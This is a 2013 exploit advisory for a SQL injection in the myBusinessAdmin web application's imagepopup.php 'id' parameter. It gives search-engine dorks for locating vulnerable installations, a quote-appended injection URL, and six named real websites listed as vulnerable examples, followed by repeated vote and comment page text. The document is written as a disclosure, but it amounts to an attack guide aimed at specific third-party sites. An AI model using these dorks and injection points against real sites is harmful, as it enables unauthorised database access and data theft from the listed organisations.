myBusinessAdmin (imagepopup.php) SQL Injection Vulnerability

2013.08.27

Credit: DevilScreaM

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: intext:Powered by myBusinessAdmin & Red Cow Technologies, Inc. OR inurl:imagepopup.php?Id=

#Exploit Title 		: myBusinessAdmin (imagepopup.php) SQL Injection Vulnerability
#Author 		: DevilScreaM
#Date   		: 22/08/2013
#Category		: Web Applications
#Vendor                 : http://mybusinessadmin.com/
#Product Link           : http://www.redcow.ca/products/mybusinessadmin/

#Dork   	
intext:Powered by myBusinessAdmin & Red Cow Technologies, Inc.
intext:Powered by myBusinessAdmin
inurl:imagepopup.php?Id=

#Vulnerability  	: SQL Injection Vulnerability
#Tested On 		: Windows 7 32 Bit (Mozila & Chrome)
#Greetz                 : Newbie-Security.or.id


SQL Injection Vulnerabilityhttp://site-target/imagepopup.php?Id=[SQLI]

Example http://site-target/imagepopup.php?id=68556'


==========================================================================

Example Sitehttp://www.yorksunburymuseum.com/imagepopup.php?id=68556'http://www.carletonhockey.ca/imagepopup.php?id=89370'http://www.kiraawards.ca/imagepopup.php?id=39851'http://www.tcquilts.com/imagepopup.php?id=15141'http://www.panb.ca/imagepopup.php?id=24455'http://www.frederictonjunction.ca/imagepopup.php?id=89842'

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

myBusinessAdmin (imagepopup.php) SQL Injection Vulnerability

Dork: intext:Powered by myBusinessAdmin & Red Cow Technologies, Inc. OR inurl:imagepopup.php?Id=

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

myBusinessAdmin (imagepopup.php) SQL Injection Vulnerability

Dork: intext:Powered by myBusinessAdmin & Red Cow Technologies, Inc. OR inurl:imagepopup.php?Id=

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.